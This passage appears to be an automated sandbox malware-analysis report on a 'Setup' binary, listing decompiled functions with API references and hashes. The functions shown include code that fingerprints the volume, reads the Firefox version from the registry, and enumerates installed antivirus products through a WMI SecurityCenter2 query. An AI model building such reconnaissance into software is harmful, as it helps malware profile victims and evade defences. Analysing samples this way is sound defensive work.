                                                                                                                                                                • Part of subcall function 0045508B: __wsplitpath_helper.LIBCMT ref: 004550CD
                                                                                                                                                              • PathAddBackslashW.SHLWAPI(?), ref: 00482A26
                                                                                                                                                              • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00482A43
                                                                                                                                                              • _sprintf.LIBCMT ref: 00482A59
                                                                                                                                                              • _strlen.LIBCMT ref: 00482A6F
                                                                                                                                                                • Part of subcall function 00448860: __vswprintf.LIBCMT ref: 00448878
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Path$Backslash$FolderInformationVolume__vswprintf__wsplitpath__wsplitpath_helper_memset_sprintf_strlen
                                                                                                                                                              • String ID: %.8x
                                                                                                                                                              • API String ID: 2556234588-3443174927
                                                                                                                                                              • Opcode ID: 81bd3fde9b9030f1fd4124bdefac55089ac51d23cde60f687ef94aade1a2b8bb
                                                                                                                                                              • Instruction ID: 7867479c3adea28f3d0d62ba70a56522cd4e3f6b322498506d0fd7f1f505525c
                                                                                                                                                              • Opcode Fuzzy Hash: 81bd3fde9b9030f1fd4124bdefac55089ac51d23cde60f687ef94aade1a2b8bb
                                                                                                                                                              • Instruction Fuzzy Hash: 7B518DB1E00218AFDB14EF94DC52FEEB778AF45304F40859AF509A7281EB746A44CF95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004D5A80 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 102windowCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 51%
                                                                                                                                                              			E004D5A80(void* __ebx, void* __edi, void* __esi, struct HWND__* _a4) {
				int _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v52;
				struct HICON__* _v56;
				char _v84;
				long _v88;
				int _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				signed int _t34;
				signed int _t35;
				signed char _t43;
				WCHAR* _t54;
				void* _t57;
				void* _t77;
				void* _t78;
				signed int _t79;

				_t78 = __esi;
				_t77 = __edi;
				_t57 = __ebx;
				_push(0xffffffff);
				_push(0x506d9c);
				_push( *[fs:0x0]);
				_t34 =  *0x561244; // 0xddd124f9
				_t35 = _t34 ^ _t79;
				_v20 = _t35;
				_push(_t35);
				 *[fs:0x0] =  &_v16;
				_v56 = 0;
				if(0x5bdf4c == 0) {
					_v92 = 0;
				} else {
					_v92 = 0x5bdf50;
				}
				_v96 = E004098D0( &_v84, _v92, L"setup.ico");
				_v100 = _v96;
				_v8 = 0;
				E00409810(_v100);
				_v8 = 2;
				E004178C0( &_v84);
				_t43 = E0049E7E0( &_v52, 0); // executed
				if((_t43 & 0x000000ff) != 0) {
					_t54 = E00416A30( &_v48);
					_v56 = LoadImageW(E00429A60(0x5c1a9c), _t54, 1, 0, 0, 0x50);
				}
				if(_v56 == 0) {
					_v56 = LoadIconW(E00429A60(0x5c1a9c), 1);
				}
				_t76 = _a4;
				if(IsWindow(_a4) != 0) {
					SendMessageW(_a4, 0x80, 1, _v56); // executed
					_t76 = _v56;
					SendMessageW(_a4, 0x80, 0, _v56); // executed
				}
				_v88 = _v56;
				_v8 = 0xffffffff;
				E004176E0();
				 *[fs:0x0] = _v16;
				return E0044F6C8(_v88, _t57, _v20 ^ _t79, _t76, _t77, _t78);
			}






















                                                                                                                                                              0x004d5a80
                                                                                                                                                              0x004d5a80
                                                                                                                                                              0x004d5a80
                                                                                                                                                              0x004d5a83
                                                                                                                                                              0x004d5a85
                                                                                                                                                              0x004d5a90
                                                                                                                                                              0x004d5a94
                                                                                                                                                              0x004d5a99
                                                                                                                                                              0x004d5a9b
                                                                                                                                                              0x004d5a9e
                                                                                                                                                              0x004d5aa2
                                                                                                                                                              0x004d5aa8
                                                                                                                                                              0x004d5ab6
                                                                                                                                                              0x004d5ac5
                                                                                                                                                              0x004d5ab8
                                                                                                                                                              0x004d5ac0
                                                                                                                                                              0x004d5ac0
                                                                                                                                                              0x004d5ae1
                                                                                                                                                              0x004d5ae7
                                                                                                                                                              0x004d5aea
                                                                                                                                                              0x004d5af8
                                                                                                                                                              0x004d5afd
                                                                                                                                                              0x004d5b04
                                                                                                                                                              0x004d5b0f
                                                                                                                                                              0x004d5b1c
                                                                                                                                                              0x004d5b29
                                                                                                                                                              0x004d5b40
                                                                                                                                                              0x004d5b40
                                                                                                                                                              0x004d5b47
                                                                                                                                                              0x004d5b5c
                                                                                                                                                              0x004d5b5c
                                                                                                                                                              0x004d5b5f
                                                                                                                                                              0x004d5b6b
                                                                                                                                                              0x004d5b7c
                                                                                                                                                              0x004d5b82
                                                                                                                                                              0x004d5b91
                                                                                                                                                              0x004d5b91
                                                                                                                                                              0x004d5b9a
                                                                                                                                                              0x004d5b9d
                                                                                                                                                              0x004d5ba7
                                                                                                                                                              0x004d5bb2
                                                                                                                                                              0x004d5bc7

                                                                                                                                                              APIs
                                                                                                                                                              • LoadImageW.USER32 ref: 004D5B3A
                                                                                                                                                              • LoadIconW.USER32(00000000,00000001), ref: 004D5B56
                                                                                                                                                              • IsWindow.USER32(004CD3AA), ref: 004D5B63
                                                                                                                                                              • SendMessageW.USER32(004CD3AA,00000080,00000001,00000000), ref: 004D5B7C
                                                                                                                                                              • SendMessageW.USER32(004CD3AA,00000080,00000000,00000000), ref: 004D5B91
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: LoadMessageSend$IconImageWindow
                                                                                                                                                              • String ID: setup.ico
                                                                                                                                                              • API String ID: 2942324917-2566955499
                                                                                                                                                              • Opcode ID: 2e6fabcc37fb763c98c8a89be4989083d70297befae0955a0de263be4558a70f
                                                                                                                                                              • Instruction ID: 2bd365032c2f552ced306848ea20a241a52543378c904a779762d3456a8b84a7
                                                                                                                                                              • Opcode Fuzzy Hash: 2e6fabcc37fb763c98c8a89be4989083d70297befae0955a0de263be4558a70f
                                                                                                                                                              • Instruction Fuzzy Hash: 02414D75A01248ABDB04DFE4DC55BEEBBB9BB48704F10852EF502AB381DB746904CB54
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00484EA0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                              			E00484EA0(void* __ebx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v16;
				char _v24;
				char _v28;
				signed int _v32;
				char _v92;
				char _v96;
				signed int _t20;
				signed int _t21;
				signed int _t23;
				signed int _t25;
				void* _t28;
				char _t30;
				signed char _t35;
				signed int _t47;
				signed int _t54;

				_t53 = __esi;
				_t52 = __edi;
				_t36 = __ebx;
				_push(0xffffffff);
				_push(0x50cca6);
				_push( *[fs:0x0]);
				_t20 =  *0x561244; // 0xddd124f9
				_t21 = _t20 ^ _t54;
				_v32 = _t21;
				_push(_t21);
				 *[fs:0x0] =  &_v16;
				_t23 =  *0x5c2b0c; // 0x1
				if((_t23 & 0x00000001) == 0) {
					_t47 =  *0x5c2b0c; // 0x1
					 *0x5c2b0c = _t47 | 0x00000001;
					_v8 = 0;
					_t35 = E00484B40(__ebx, __edi, __esi); // executed
					asm("sbb edx, edx");
					_t49 =  ~( ~(_t35 & 0x000000ff));
					 *0x5c2b08 =  ~( ~(_t35 & 0x000000ff));
					_v8 = 0xffffffff;
				}
				if( *0x5c2b08 <= 1) {
					E00434E30( &_v24);
					_v8 = 1;
					_t28 = E0041EEA0( &_v24, 0x80000002, L"SOFTWARE\\Mozilla\\Mozilla Firefox", 1); // executed
					if(_t28 == 0) {
						_t30 = "0"; // 0x30
						_v96 = _t30;
						E00451D90(_t52,  &_v92, 0, 0x3c);
						_v28 = 0x20;
						_t49 =  &_v28;
						E0041EDE0( &_v24, L"CurrentVersion",  &_v96,  &_v28);
						 *0x5c2b08 = E00451CBD( &_v96, 0, 0xa);
					}
					_v8 = 0xffffffff;
					E0041EF60( &_v24);
				}
				_t25 =  *0x5c2b08; // 0x0
				 *[fs:0x0] = _v16;
				return E0044F6C8(_t25, _t36, _v32 ^ _t54, _t49, _t52, _t53);
			}



















                                                                                                                                                              0x00484ea0
                                                                                                                                                              0x00484ea0
                                                                                                                                                              0x00484ea0
                                                                                                                                                              0x00484ea3
                                                                                                                                                              0x00484ea5
                                                                                                                                                              0x00484eb0
                                                                                                                                                              0x00484eb4
                                                                                                                                                              0x00484eb9
                                                                                                                                                              0x00484ebb
                                                                                                                                                              0x00484ebe
                                                                                                                                                              0x00484ec2
                                                                                                                                                              0x00484ec8
                                                                                                                                                              0x00484ed0
                                                                                                                                                              0x00484ed2
                                                                                                                                                              0x00484edb
                                                                                                                                                              0x00484ee1
                                                                                                                                                              0x00484ee8
                                                                                                                                                              0x00484ef2
                                                                                                                                                              0x00484ef4
                                                                                                                                                              0x00484ef6
                                                                                                                                                              0x00484efc
                                                                                                                                                              0x00484efc
                                                                                                                                                              0x00484f0a
                                                                                                                                                              0x00484f0f
                                                                                                                                                              0x00484f14
                                                                                                                                                              0x00484f2a
                                                                                                                                                              0x00484f31
                                                                                                                                                              0x00484f33
                                                                                                                                                              0x00484f38
                                                                                                                                                              0x00484f43
                                                                                                                                                              0x00484f4b
                                                                                                                                                              0x00484f52
                                                                                                                                                              0x00484f62
                                                                                                                                                              0x00484f77
                                                                                                                                                              0x00484f77
                                                                                                                                                              0x00484f7c
                                                                                                                                                              0x00484f86
                                                                                                                                                              0x00484f86
                                                                                                                                                              0x00484f8b
                                                                                                                                                              0x00484f93
                                                                                                                                                              0x00484fa8

                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Iterator_baseIterator_base::___wcstoi64_memsetstd::_
                                                                                                                                                              • String ID: $CurrentVersion$SOFTWARE\Mozilla\Mozilla Firefox
                                                                                                                                                              • API String ID: 3485345583-1023798336
                                                                                                                                                              • Opcode ID: 61034f3484858b031ddec6510427f16abae38c00ff857c6c04db67119d5ca015
                                                                                                                                                              • Instruction ID: 5e62964c8161c01d3a93b7efa467fe588d9bb2ef01a0888bc2b9f6aa12e67c5a
                                                                                                                                                              • Opcode Fuzzy Hash: 61034f3484858b031ddec6510427f16abae38c00ff857c6c04db67119d5ca015
                                                                                                                                                              • Instruction Fuzzy Hash: AA21D0B09006099FDB14DF95D842FAEB7B4FB54714F00821EF911AB2D1EB382E08CB45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00451FC6 Relevance: 10.6, APIs: 7, Instructions: 71threadCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E00451FC6(void* __edx, void* __esi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t20;
				DWORD* _t25;
				intOrPtr* _t27;
				char _t41;
				void* _t44;

				_t41 = _a12;
				_v8 = 0;
				_t48 = _t41;
				if(_t41 != 0) {
					_push(__esi);
					E00457212();
					_t44 = E00457789(1, 0x214);
					__eflags = _t44;
					if(__eflags == 0) {
						L7:
						_push(_t44);
						E0044FAFC(0, _t41, _t44, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E0045449D(_v8);
						}
						_t20 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E00457400(0, __edx, _t41, __eflags) + 0x6c)));
						_push(_t44);
						E004572A0(0, _t41, _t44, __eflags);
						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
						_t25 = _a24;
						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
						__eflags = _t25;
						if(_t25 == 0) {
							_t25 =  &_a12;
						}
						_t20 = CreateThread(_a4, _a8, E00451F43, _t44, _a20, _t25); // executed
						__eflags = _t20;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L7;
						}
					}
				} else {
					_t27 = E00454477(_t48);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t27 = 0x16;
					E004557A5(__edx, _t41, __esi);
					_t20 = 0;
				}
				return _t20;
			}












                                                                                                                                                              0x00451fce
                                                                                                                                                              0x00451fd3
                                                                                                                                                              0x00451fd6
                                                                                                                                                              0x00451fd8
                                                                                                                                                              0x00451ff6
                                                                                                                                                              0x00451ff7
                                                                                                                                                              0x00452008
                                                                                                                                                              0x0045200c
                                                                                                                                                              0x0045200e
                                                                                                                                                              0x0045205a
                                                                                                                                                              0x0045205a
                                                                                                                                                              0x0045205b
                                                                                                                                                              0x00452061
                                                                                                                                                              0x00452064
                                                                                                                                                              0x00452069
                                                                                                                                                              0x0045206e
                                                                                                                                                              0x0045206f
                                                                                                                                                              0x0045206f
                                                                                                                                                              0x00452010
                                                                                                                                                              0x00452015
                                                                                                                                                              0x00452018
                                                                                                                                                              0x00452019
                                                                                                                                                              0x00452021
                                                                                                                                                              0x00452025
                                                                                                                                                              0x00452028
                                                                                                                                                              0x0045202d
                                                                                                                                                              0x00452030
                                                                                                                                                              0x00452032
                                                                                                                                                              0x00452034
                                                                                                                                                              0x00452034
                                                                                                                                                              0x00452047
                                                                                                                                                              0x0045204d
                                                                                                                                                              0x0045204f
                                                                                                                                                              0x00452057
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00452057
                                                                                                                                                              0x0045204f
                                                                                                                                                              0x00451fda
                                                                                                                                                              0x00451fda
                                                                                                                                                              0x00451fdf
                                                                                                                                                              0x00451fe0
                                                                                                                                                              0x00451fe1
                                                                                                                                                              0x00451fe2
                                                                                                                                                              0x00451fe3
                                                                                                                                                              0x00451fe4
                                                                                                                                                              0x00451fea
                                                                                                                                                              0x00451ff2
                                                                                                                                                              0x00451ff2
                                                                                                                                                              0x00452075

                                                                                                                                                              APIs
                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00451FF7
                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00452003
                                                                                                                                                              • __getptd.LIBCMT ref: 00452010
                                                                                                                                                              • __initptd.LIBCMT ref: 00452019
                                                                                                                                                              • CreateThread.KERNEL32 ref: 00452047
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00452051
                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00452069
                                                                                                                                                                • Part of subcall function 00454477: __getptd_noexit.LIBCMT ref: 00454477
                                                                                                                                                                • Part of subcall function 004557A5: __decode_pointer.LIBCMT ref: 004557B0
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3358092440-0
                                                                                                                                                              • Opcode ID: 26d222637614caea9229c71ed777be5846206efd60edda216f56c581922281af
                                                                                                                                                              • Instruction ID: c78e5e2b538e6bd289abf04ab91bbdd9a97470878333c0d25e63948099598028
                                                                                                                                                              • Opcode Fuzzy Hash: 26d222637614caea9229c71ed777be5846206efd60edda216f56c581922281af
                                                                                                                                                              • Instruction Fuzzy Hash: 11110872504205AFDB10BFA5EC4199F77E4EF05329B10403FFD00961A3EBB89D49DA68
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 004956B0 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 293comCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 73%
                                                                                                                                                              			E004956B0(void* __ebx, signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				signed int _v20;
				char _v48;
				char _v52;
				signed int _v56;
				char _v60;
				char _v64;
				signed int _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v88;
				char _v96;
				char _v97;
				char _v104;
				char _v108;
				signed int _v112;
				char* _v116;
				signed int* _v120;
				signed int _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				intOrPtr* _v148;
				signed int _t132;
				signed int _t133;
				signed int _t138;
				signed char _t148;
				signed int _t155;
				signed char _t159;
				signed int _t160;
				signed int _t170;
				signed char _t177;
				signed int _t188;
				signed char _t189;
				signed int _t194;
				signed char _t195;
				void* _t204;
				void* _t279;
				void* _t280;
				signed int _t281;

				_t280 = __esi;
				_t279 = __edi;
				_t272 = __edx;
				_t204 = __ebx;
				_push(0xffffffff);
				_push(0x5068d3);
				_push( *[fs:0x0]);
				_t132 =  *0x561244; // 0xddd124f9
				_t133 = _t132 ^ _t281;
				_v20 = _t133;
				_push(_t133);
				 *[fs:0x0] =  &_v16;
				_v112 = 0;
				E004175C0(E00434050( &_v97));
				_v8 = 1;
				while(1) {
					E00414C90();
					_v8 = 2;
					_t138 = E00434050( &_v60);
					__imp__CoCreateInstance(0x51d91c, 0, 1, 0x51d84c, _t138); // executed
					_v68 = _t138;
					if(_v68 < 0 || (E00431950( &_v60) & 0x000000ff) != 0) {
						break;
					}
					E00414C90();
					_v8 = 3;
					_t148 = E00494F20(__eflags);
					__eflags = _t148 & 0x000000ff;
					if((_t148 & 0x000000ff) == 0) {
						_v116 = L"root\\SecurityCenter";
					} else {
						_v116 = L"root\\SecurityCenter2";
					}
					E00416A50( &_v72, _v116);
					_v8 = 4;
					_v120 = E0041D530( &_v60);
					_t272 =  *_v120;
					_t155 =  *((intOrPtr*)( *((intOrPtr*)( *_v120 + 0xc))))(_v120, E0041D530( &_v72), 0, 0, 0, 0, 0, 0, E00434050( &_v80)); // executed
					_v68 = _t155;
					__eflags = _v68;
					if(_v68 < 0) {
						L9:
						_v8 = 3;
						E00417300( &_v72);
						_v8 = 2;
						E0040D320();
						_v8 = 1;
						E0040D320();
					} else {
						_t159 = E00431950( &_v80);
						__eflags = _t159 & 0x000000ff;
						if((_t159 & 0x000000ff) == 0) {
							_t160 = E0041D530( &_v80);
							__imp__CoSetProxyBlanket(_t160, 0xa, 0, 0, 3, 3, 0, 0); // executed
							_v68 = _t160;
							__eflags = _v68;
							if(_v68 >= 0) {
								E00414C90();
								_v8 = 5;
								_v124 = E0041D530( &_v80);
								_v128 = E00416A50( &_v104, L"SELECT * FROM AntivirusProduct");
								_v132 = _v128;
								_v8 = 6;
								_v136 = E00416A50( &_v108, L"WQL");
								_v140 = _v136;
								_v8 = 7;
								_t272 = _v124;
								_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_v124 + 0x50))))(_v124, E0041D530(_v140), E0041D530(_v132), 0x30, 0, E00434050( &_v64)); // executed
								_v68 = _t170;
								_v8 = 6;
								E00417300( &_v108);
								_v8 = 5;
								E00417300( &_v104);
								__eflags = _v68;
								if(_v68 < 0) {
									L14:
									_v8 = 4;
									E0040D320();
									_v8 = 3;
									E00417300( &_v72);
									_v8 = 2;
									E0040D320();
									_v8 = 1;
									E0040D320();
								} else {
									_t177 = E00431950( &_v64);
									_t272 = _t177 & 0x000000ff;
									__eflags = _t177 & 0x000000ff;
									if((_t177 & 0x000000ff) == 0) {
										E00414C90();
										_v8 = 8;
										while(1) {
											__eflags = 1;
											if(1 == 0) {
												break;
											}
											_v56 = 0;
											_v144 = E0041D530( &_v64);
											_t188 =  *((intOrPtr*)( *((intOrPtr*)( *_v144 + 0x10))))(_v144, 0xffffffff, 1, E00434050( &_v76),  &_v56); // executed
											_v68 = _t188;
											__eflags = _v68;
											if(_v68 < 0) {
												L20:
											} else {
												_t189 = E00431950( &_v76);
												__eflags = _t189 & 0x000000ff;
												if((_t189 & 0x000000ff) != 0) {
													goto L20;
												} else {
													__eflags = _v56;
													if(_v56 != 0) {
														E00416A10( &_v96);
														_v8 = 9;
														_v148 = E0041D530( &_v76);
														_t194 =  *((intOrPtr*)( *((intOrPtr*)( *_v148 + 0x10))))(_v148, L"displayName", 0,  &_v96, 0, 0); // executed
														_v68 = _t194;
														_t195 = E00416630( &_v48);
														__eflags = _t195 & 0x000000ff;
														if((_t195 & 0x000000ff) == 0) {
															E004130D0( &_v48, ";");
														}
														E004130D0( &_v48, _v88);
														E00407680( &_v76);
														_v8 = 8;
														E00417430( &_v96);
														continue;
													} else {
														goto L20;
													}
												}
											}
											break;
										}
										_v8 = 5;
										E0040D320();
										_v8 = 4;
										E0040D320();
										_v8 = 3;
										E00417300( &_v72);
										_v8 = 2;
										E0040D320();
										_v8 = 1;
										E0040D320();
										_t272 = 0;
										__eflags = 0;
										if(0 != 0) {
											continue;
										}
									} else {
										goto L14;
									}
								}
							} else {
								_v8 = 3;
								E00417300( &_v72);
								_v8 = 2;
								E0040D320();
								_v8 = 1;
								E0040D320();
							}
						} else {
							goto L9;
						}
					}
					L25:
					E00417660(_a4,  &_v52);
					_v112 = _v112 | 0x00000001;
					_v8 = 0;
					E004176E0();
					 *[fs:0x0] = _v16;
					return E0044F6C8(_a4, _t204, _v20 ^ _t281, _t272, _t279, _t280);
				}
				_v8 = 1;
				E0040D320();
				goto L25;
			}















































                                                                                                                                                              0x004956b0
                                                                                                                                                              0x004956b0
                                                                                                                                                              0x004956b0
                                                                                                                                                              0x004956b0
                                                                                                                                                              0x004956b3
                                                                                                                                                              0x004956b5
                                                                                                                                                              0x004956c0
                                                                                                                                                              0x004956c7
                                                                                                                                                              0x004956cc
                                                                                                                                                              0x004956ce
                                                                                                                                                              0x004956d1
                                                                                                                                                              0x004956d5
                                                                                                                                                              0x004956db
                                                                                                                                                              0x004956ee
                                                                                                                                                              0x004956f3
                                                                                                                                                              0x004956fa
                                                                                                                                                              0x004956fd
                                                                                                                                                              0x00495702
                                                                                                                                                              0x00495709
                                                                                                                                                              0x0049571d
                                                                                                                                                              0x00495723
                                                                                                                                                              0x0049572a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049574f
                                                                                                                                                              0x00495754
                                                                                                                                                              0x00495758
                                                                                                                                                              0x00495760
                                                                                                                                                              0x00495762
                                                                                                                                                              0x0049576d
                                                                                                                                                              0x00495764
                                                                                                                                                              0x00495764
                                                                                                                                                              0x00495764
                                                                                                                                                              0x0049577b
                                                                                                                                                              0x00495780
                                                                                                                                                              0x0049578c
                                                                                                                                                              0x004957b4
                                                                                                                                                              0x004957b9
                                                                                                                                                              0x004957bb
                                                                                                                                                              0x004957be
                                                                                                                                                              0x004957c2
                                                                                                                                                              0x004957d3
                                                                                                                                                              0x004957d3
                                                                                                                                                              0x004957da
                                                                                                                                                              0x004957df
                                                                                                                                                              0x004957e6
                                                                                                                                                              0x004957eb
                                                                                                                                                              0x004957f2
                                                                                                                                                              0x004957c4
                                                                                                                                                              0x004957c7
                                                                                                                                                              0x004957cf
                                                                                                                                                              0x004957d1
                                                                                                                                                              0x0049580d
                                                                                                                                                              0x00495813
                                                                                                                                                              0x00495819
                                                                                                                                                              0x0049581c
                                                                                                                                                              0x00495820
                                                                                                                                                              0x0049584e
                                                                                                                                                              0x00495853
                                                                                                                                                              0x0049585f
                                                                                                                                                              0x0049586f
                                                                                                                                                              0x00495875
                                                                                                                                                              0x00495878
                                                                                                                                                              0x00495889
                                                                                                                                                              0x00495895
                                                                                                                                                              0x0049589b
                                                                                                                                                              0x004958c5
                                                                                                                                                              0x004958cd
                                                                                                                                                              0x004958cf
                                                                                                                                                              0x004958d2
                                                                                                                                                              0x004958d9
                                                                                                                                                              0x004958de
                                                                                                                                                              0x004958e5
                                                                                                                                                              0x004958ea
                                                                                                                                                              0x004958ee
                                                                                                                                                              0x004958ff
                                                                                                                                                              0x004958ff
                                                                                                                                                              0x00495906
                                                                                                                                                              0x0049590b
                                                                                                                                                              0x00495912
                                                                                                                                                              0x00495917
                                                                                                                                                              0x0049591e
                                                                                                                                                              0x00495923
                                                                                                                                                              0x0049592a
                                                                                                                                                              0x004958f0
                                                                                                                                                              0x004958f3
                                                                                                                                                              0x004958f8
                                                                                                                                                              0x004958fb
                                                                                                                                                              0x004958fd
                                                                                                                                                              0x00495937
                                                                                                                                                              0x0049593c
                                                                                                                                                              0x00495940
                                                                                                                                                              0x00495945
                                                                                                                                                              0x00495947
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049594d
                                                                                                                                                              0x0049595c
                                                                                                                                                              0x00495985
                                                                                                                                                              0x00495987
                                                                                                                                                              0x0049598a
                                                                                                                                                              0x0049598e
                                                                                                                                                              0x004959a5
                                                                                                                                                              0x00495990
                                                                                                                                                              0x00495993
                                                                                                                                                              0x0049599b
                                                                                                                                                              0x0049599d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0049599f
                                                                                                                                                              0x0049599f
                                                                                                                                                              0x004959a3
                                                                                                                                                              0x004959ad
                                                                                                                                                              0x004959b2
                                                                                                                                                              0x004959be
                                                                                                                                                              0x004959e5
                                                                                                                                                              0x004959e7
                                                                                                                                                              0x004959ed
